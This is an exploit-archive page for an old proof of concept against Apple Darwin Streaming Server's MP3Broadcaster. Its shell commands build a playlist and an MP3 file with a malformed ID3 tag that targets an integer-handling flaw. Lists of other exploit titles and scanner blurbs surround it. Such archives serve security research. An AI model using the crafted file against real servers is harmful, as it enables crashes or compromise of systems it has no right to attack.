Menu

Search for hundreds of thousands of exploits

"Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling"

Author

Exploit author

"Sir Mordred"

Platform

Exploit platform

osx

Release date

Exploit published date

2003-05-22

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
source: https://www.securityfocus.com/bid/7660/info

MP3Broadcaster is shipped as part of Darwin Streaming Server software.

MP3Broadcaster has been reported prone to a vulnerability when processing malicious ID3 tags. This is likely due to insufficient sanity checks performed when handling signed integer values contained within MP3 file ID3 tags.

First create the sample configuration file:
$ echo -e "\n" > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00

" > song.mp3
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-02-11 "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)" remote osx Metasploit
2017-08-09 "NoMachine 5.3.9 - Local Privilege Escalation" local osx "Daniele Linguaglossa"
2017-07-15 "Apple Mac OS X + Safari - Local Javascript Quarantine Bypass" local osx "Filippo Cavallarin"
2017-05-01 "HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation" local osx "Han Sahin"
2017-04-13 "GNS3 Mac OS-X 1.5.2 - 'ubridge' Local Privilege Escalation" local osx "Hacker Fantastic"
2017-02-01 "Apple WebKit - 'HTMLFormElement::reset()' Use-After Free" dos osx "Google Security Research"
2017-01-23 "Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution" local osx "Filippo Cavallarin"
2017-01-10 "Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic" dos osx "Brandon Azad"
2016-12-16 "Horos 2.1.0 DICOM Medical Image Viewer - Denial of Service" dos osx LiquidWorm
2016-12-16 "Horos 2.1.0 Web Portal - Directory Traversal" remote osx LiquidWorm
Release Date Title Type Platform Author
2003-05-22 "Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module - Integer Overflow" dos osx "Sir Mordred"
2003-05-22 "Nessus 2.0.x - LibNASL Arbitrary Code Execution" dos multiple "Sir Mordred"
2003-05-22 "Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling" remote osx "Sir Mordred"
2003-03-26 "PHP 4.x - 'socket_recvfrom()' Signed Integer Memory Corruption" dos php "Sir Mordred"
2003-03-26 "PHP 4.x - 'socket_recv()' Signed Integer Memory Corruption" dos php "Sir Mordred"
2003-03-25 "PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow" dos php "Sir Mordred" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected